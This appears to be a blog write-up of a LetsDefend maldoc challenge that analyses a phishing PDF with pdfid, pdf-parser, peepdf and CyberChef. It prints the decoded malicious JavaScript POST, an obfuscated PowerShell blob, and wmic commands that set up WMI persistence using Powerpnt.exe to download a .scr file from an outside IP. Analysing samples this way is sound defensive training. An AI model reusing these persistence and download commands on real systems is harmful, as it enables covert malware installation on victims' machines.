PDF Analysis
PDF Analysis
Welcome back to yet another blog post where I will be tackling a Maldoc kinda challenge from Lets Defend. This is a medium rated challenge prepared by @DXploiter called PDF Analysis.
We are told that an employee has received a suspicious email with the following contents:
From: SystemsUpdate@letsdefend.io To: Paul@letsdefend.io Subject: Critical - Annual Systems UPDATE NOW Body: Please do the dutiful before the deadline today. Attachment: Update.pdf Password:
letsdefend
The employee has reported this incident to us and mentioned that they did not download or open the attachment as they found it very suspicious. With this in mind, i proceeded to download the attachment from GoogleDrive and extracted it with the password: letsdefend
1. What local directory name would have been targeted by the malware?
On my analyst workstation, we can start by running file command to verify that it indeed a pdf file. We can also examine exifdata to check if there are other interesting metadata.
From the above, we see that it’s only a one page document. Lets analyze the pdf further using the pdfid utility. In a previous blog post (Suspicious USB), i have covered a couple of tools i use to analyze malicious pdf’s. Perhaps you can give it a look to learn more about the same.
Executing the command shown below, we get
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜  pdfid Update.pdf 
PDFiD 0.2.8 Update.pdf
 PDF Header: %PDF-1.6
 obj                   36
 endobj                35
 stream                 7
 endstream              6
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            3
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                2
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
Lets try and demystify what each of this mean:
- PDF Header: %PDF-1.6- Indicates that this PDF file is using version 1.6 of the PDF specification.
- obj 36- Indicates that there are 36 indirect objects in the PDF. Indirect objects are building blocks for PDF files and can contain various data such as images, text, or even other PDFs.
- endobj 35- Indicates that there are 35 ‘endobj’ keywords in the PDF, signifying the end of an indirect object.
- stream 7and- endstream 6- Indicate that there are 7 ‘stream’ keywords and 6 ‘endstream’ keywords. These are used to encapsulate data within the PDF. This can include image data, embedded files, or even code.
- xref 1- Indicates there is 1 cross-reference table, which is used to locate objects within the file.
- trailer 1- Indicates there is 1 trailer. The trailer contains additional information needed to correctly parse the PDF.
- startxref 1- Indicates there is 1 ‘startxref’ keyword, which tells a reader where the cross-reference table begins.
- /Page 1- Indicates that there is 1 page object. This object is a part of the logical structure of the PDF and represents an individual page.
- /Encrypt 0- Indicates that there are no encryption objects. If this were above 0, it would mean the PDF is encrypted, which can sometimes be a red flag 🚩 for malicious content.
- /JS 0and- /JavaScript 0- Indicate that there are no JavaScript objects or sections. JavaScript within a PDF can sometimes be used for malicious purposes.
- /OpenAction 3- Indicates that there are 3 actions that will be performed when the PDF is opened. This is something to be cautious of, as malicious PDFs often use this to execute code upon opening. 🚩
- /Launch 2Indicates that there are 2 launch actions. This can be used to run an application or execute code, and is often associated with malicious PDFs.
- /EmbeddedFile 0- Indicates that there are no embedded files within the PDF.
With that in mind, we can also use another tool called pdf-parser to analyse the PDFs statistics.
The
pdf-parseris a Python script that can be used to parse PDF documents and analyze their structure. This tool is particularly useful for analyzing suspicious or malicious PDF files, or for exploring the internals of a PDF document. It is part of the DidierStevensSuite, a set of Python tools developed by Didier Stevens for handling various file formats.
We can append the -a switch which display stats for pdf document
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜  pdf-parser -a Update.pdf                
This program has not been tested with this version of Python (3.10.9)
Should you encounter problems, please use Python version 3.10.4
Comment: 10
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 35
Indirect objects with a stream: 2, 5, 8, 10, 13, 33
  28: 2, 3, 5, 6, 8, 10, 11, 13, 19, 15, 16, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 34, 35, 36, 33
 /Catalog 1: 17
 /Font 2: 9, 14
 /FontDescriptor 2: 7, 12
 /Page 1: 1
 /Pages 1: 4
Search keywords:
 /OpenAction 3: 19, 26, 17
 /Launch 2: 19, 26
Here, we get preety much the same info.
So what next?
Lets try run strings on the PDF and see what we can find.
Right off the bat, we see some powershell command with the -EncodedCommand parameter, which allows you to pass a Base64-encoded command to PowerShell for execution.
Lets decode this:
We get a wierd string. It took me a moment to realise that the string is reversed. So i used the following CyberChef Recipe to clean it up.
Here, we get the local directory name would have been targeted by the malware:
C:\Documents\
2. What would have been the name of the file created by the payload?
From the DestinationPath shown above, we see the name of the payload is D0csz1p
D0csz1p
3. What file type would this have been if it were created?
Carefully looking at the payload name (D0csz1p). This seemed more like a Docs.zip to me, so i submitted zip as my answer.🙂
zip
4. Which external web domain would the malware have attempted to interact with?
Inspecting the strings further, we get:
This code looks like some obfuscated JavaScript code that uses a technique known as a packed script. In this obfuscated code, there is an eval function that is intended to execute the deobfuscated JavaScript code.
I thought pdf-parser & pdfid didn’t pickup Javascript objects/code.
Lets use another tool called peepdf.
Executing it with -i flag, we get into an interactive mode & -f to ignore any errors.
From the screenshot above, we now see 2 objects with JS code.
If we use the js_code command with the object id containing the JS, we get the Original and Next Stage code.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
var url = "https://filebin.net/0flqlz0hiz6o4l32/D0csz1p";
var xhr = new XMLHttpRequest();
xhr.open("POST", url);
xhr.setRequestHeader("Content-Type", "application/octet-stream");
xhr.setRequestHeader("login", "");
xhr.setRequestHeader("password", "");
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4) {
        console.log(xhr.status);
        console.log(xhr.responseText);
    }
};
var data = '{"login":"","password":""}';
xhr.send(data);
This looks like it is making a HTTP POST request to hxxps://filebin.net/0flqlz0hiz6o4l32/D0csz1p using the XMLHttpRequest object. It also looks like it’s sending JSON data with empty login and password fields. The response status and response text are being logged to the console.
From the above we get answers to questions 4-6
filebin.net
5. Which HTTP method would it have used to interact with this service?
POST
6. What is the name of the obfuscation used for the Javascript payload?
eval
7. Which tool would have been used for creating the persistence mechanism?
On further inspection of the strings, we get another blob of powershell shenanigans.
Normally, i would try execute this on my test Windows VM but i accidentally deleted it 😬. Not to worry, we can execute this on powershell in our Kali environment.
In the screenshot above, i have separated the commands in 3:
1
2
3
4
5
6
7
8
9
10
11
12
─PS> $best64code = ("{5}{0}{2}{30}{12}{1}{14}{15}{6}{21}{31}{20}{10}{28}{7}{24}{11}{13}{22}{25}{17}{3}{19}{8}{4}{23}{26}{9}{16}{18}{27}{29}"-f 'mTuIX
Z0xWaGRnblZXRf9lI9','atdnCNoQDiI3Yz','IXZ0xWaGBSRUFURSNEIn5Wak5WaCJXZtV3cu92QvRlclRHbpZ0XfBCSUFEUgIibvlGdwlmcjNnY1NHX092byx','EIlNmbhR3culEdldmchRFIFJVRIdFIwAD','F','=IiIcp
Gb2dkYaN3VIJlIc1TZtFmTuIXZtV3cu92Q05WZ2VUZulGTk5WYt12bDJSPyVWb1NnbvNEIsIiIcN2ZJV1alFlZHVmIc1TZtF','h2YhNUZslmRlNWamZ2TcBjL2EDXlNWamZ2TcRnZvN3byNWaNxFbhN2bMxVY0FGRwBXQcVSRMl
kRPJFUSV0UVVCXzJXZzVFX6MkI9UGdhx','vJHXlNWamZ2TgQnZvN3byNWa','Zv1UZj5WY0NnbJ91Xg00TSZEIqACVDVET','dn5WYMl','Wb','LioGb2dkYaN3VIJlI9UWbh5EIFRVQFJ1QgIXZtV3cu92Q05WZ2','gMW','
VUZulGTk5WYt12bDBCSUFEUgIibvlGdwlmcjNnY1NHX092byxFXioTRDFEUTVUTB50','5iM4Qjc','lBXYwxGbhdHXl','nclVXUsIiM21WajxFdv9mci0TZjFGcTVWbh5EduVmdFBCLiM2ZJV1alFlZHV','UfJzMul2VnASQT
l','mI9UWbh5EIFRVQF','M5AiTJhEVJdFI05WZ2VkbvlGdhNWamlG','Rmbh1','GctVGVl5W','LgMWatdnCNoQDicSblR3c5N1XT9kZyVGUfFGdhREZlRHdh1','NlI9knclVXUgwiIMF1Vi0T','Nx1clxWaGBSbhJ3ZvJHU
cpzQi0Da0FGUlxmYhRXdjVGeFBC','mcvZkZyVG','ZnFW','J1QgIXZ0xWaGRnblZXRf9F','vNELiAyJyN2cuIDO0IXZwFGcsxWY39CN14CN4EjL3gTMuAjNv8iOwRHdodCIlhXZuQnbwJXZ39GUcZTMlNWamZ2TcR3b','IIR
VQQBiIu9Wa0BXayN2ciV3ccR3bvJHXcJiOFNUQQNVRNFkTvAyYp12d','FXioTRDFEUTVUTB50L','aM')
─PS> $base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null
─PS> $LoadCode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$base64"))
─PS> Write-Output $LoadCode
Locate powershell and execute the commands as shown below:
From the output, we now have readable commands that we will be breaking down in a few:
1
2
3
4
5
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="eGfQekUIgc", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 9000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="RHWsZbGvlj", ExecutablePath="C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe 'http://60.187.184.54/wallpaper482.scr' ",CommandLineTemplate="C:\Users\%USERPROFILE%\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\wallpaper482.scr"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"eGfQekUIgc\"", Consumer="CommandLineEventConsumer.Name=\"RHWsZbGvlj\""
We see that WMIC (Windows Management Instrumentation Command-line) has been used to create persistence.
In the first command, we see that an event filter is being created. An event filter is basically a condition that waits for something specific to happen. It’s been given a name eGfQekUIgc. We also see a namespace root\cimv2 beng specified. A query language WQL (WMI Query Language) is specified and a query SELECT * FROM __InstanceModificationEvent WITHIN 9000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' seems to be run. This specific query means that it’s looking for any modification events where the target instance is of type ‘Win32_PerfFormattedData_PerfOS_System’, and it checks every 9000 seconds (2.5 hours).
With this in mind, we have our answer as wmic and the answer to question 8 - 2.5 hours
wmic
8. How often would the persistence be executed once Windows starts? (format: X.X hours)?
2.5 hours
9. Which LOLBin would have been used in the persistence method?
The second command creates a command line event consumer. Basically, this is the action that will be performed when the event filter condition is met. In this case, the CommandLineEventConsumer is given a name RHWsZbGvlj. ExecutablePath="C:\Program Files\Microsoft Office\root\Office16\Powerpnt.exe 'http://60.187.184.54/wallpaper482.scr' " indicates that Powerpnt.exe will be used to download a file from the specified URL. This is abit sus.
CommandLineTemplate="C:\Users\%USERPROFILE%\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\wallpaper482.scr" specifies where the downloaded file (wallpaper482.scr) will be saved on the system.
With this in mind, we know that Powerpnt.exe is a known LOLBin used to download payloads from remote servers.
For more information, feel free to check the lolbas-project
Powerpnt.exe
10. What is the filename that would have been downloaded and executed using the LOLbin?
<refer to explanation on question 9 above>
wallpaper482.scr
11. Where would this have been downloaded from? (format: IP address)
<refer to explanation on question 9 above>
60.187.184.54
12. Which country is this IP Address located in?
With basic tools such as whois, we can see roots of the IP address as China.
China
Troubleshooting peedf issues
In order to get peepdf working properly you need pylibemu and PyV8. Here’s how:
for pylibemu:
1
pip install pylibemu
for PyV8:
1
2
3
4
5
6
cd /usr/share
sudo git clone https://github.com/emmetio/pyv8-binaries.git
cd pyv8-binaries/
sudo unzip pyv8-linux64.zip
sudo cp -a PyV8.py _PyV8.so /usr/bin
sudo cp -a PyV8.py _PyV8.so /usr/lib/python2.7/dist-packages/
This brings me to the end of my blog post. I hope you got to learn a thing or two. I’m looking forward to doing and writing more of this kind of Maldoc challenges. If you found this helpful, feel free to share this with your networks, peers or your socials.
Btw, if you have any questions, comments or feedback in regards to the same, feel free to reach me on twitter @oste_ke.

















